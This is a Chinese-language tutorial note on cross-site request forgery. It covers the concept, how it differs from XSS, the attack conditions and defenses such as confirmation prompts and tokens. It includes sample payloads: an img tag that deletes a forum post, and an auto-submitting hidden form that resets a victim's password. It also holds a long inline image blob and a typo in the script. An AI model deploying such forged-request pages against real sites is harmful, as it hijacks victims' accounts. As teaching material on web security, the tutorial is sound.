4_CSRF
CSRF
当你登录某个网站时,通常浏览器与网站都会形成一个会话,在会话没有结束时你可以执行
发表文章、发邮件、删除文章等操作,若会话结束,你再操作的话会提示你会话已经结束,
请重新登录。
CSRF(客户端跨站请求伪造)就是:攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾认证过的网站并执行
一些操作。也可以说CSRF就是黑客利用受害者的Cookie骗取服务器的信任从而执行一些操作。
CSRF和SSRF都不能盗取Cookies
XSS区别
XSS利用的是用户对指定网站的信任
CSRF利用的是网站对用户网页浏览器的信任
利用
利用条件:
1.攻击者可以得知url的所有参数项并了解其含义。
2.诱导用户访问构造好的payload
3.简单的身份验证只能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。
利用地方:
1.操作是有意义的(比如:修改密码等)
2.验证过于简单(参数固定、我们可以设置参数)
GET型CSRF攻击
若有论坛www.aa.com,论坛删除文章的操作是请求类似
http://www.aa.com/opt.php?id=135&act=del&name=Tom的链接
有用户A,他登录了论坛,且有篇文章id=251,那么他的浏览器此时已经取得了论坛的信任
此时有hacker用户B,他构造了一个src跳转html为b.html,b,html内容如下:
<html>
<head>
<title>test</title>
</head>
<body>
<img src="http://www.aa.com/opt.php?id=251&act=del&name=A" />
</body>
</html>
将b.html放在他自己搭建的网站上,网址为http://www.bb.com/b.html
POST型CSRF攻击
aaarticlea/png;base64,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" alt="" />
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>aa</title>
</head>
<body>
<form action="http://172.23.10.200/index.php/User/Index/RegisterUpdate/id/286" method="post">
昵称:<input type="text" name="password" id="password" class="form-control" value="xxxxx">
用户名:<input type="text" name="password" id="password" class="form-control" value="xiaoming">
密码:<input type="password" name="password" id="password" class="form-control" value="">
确认密码:<input type="password" name="cpassword" id="conpassword" class="form-control" value="">
<input type="submit" name="button" value="提交">
</form>
</body>
</html>此时我们就可以构造自动提交表单的xxxx.html,内容如下:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>test</title>
</head>
<body>
<form action="http://172.23.10.200/index.php/User/Index/RegisterUpdate/id/286" method="post" id="test">
<input type="hidden" name="password" id="password" value="666666">
<input type="hidden" name="cpassword" id="conpassword" value="666666">
</form>
<script type="text/javascript">
widow.onload= function(){
document.getElementById('test').submit();
// document.forms[0].submit();
}
</script>
</body>
</html>
然后将链接http://www.bb.com/wwww.html发送给用户,诱使他点击链接,一旦他点击,则密码就会被修改
防御
1.二次确认(如删除用户,转账等重要操作弹窗要求用户确认)
2.Token认证
GET操作请求:可以在Cookie中存储Token
POST操作请求:可以在form表单中添加一个隐藏的input标签,value值为Token
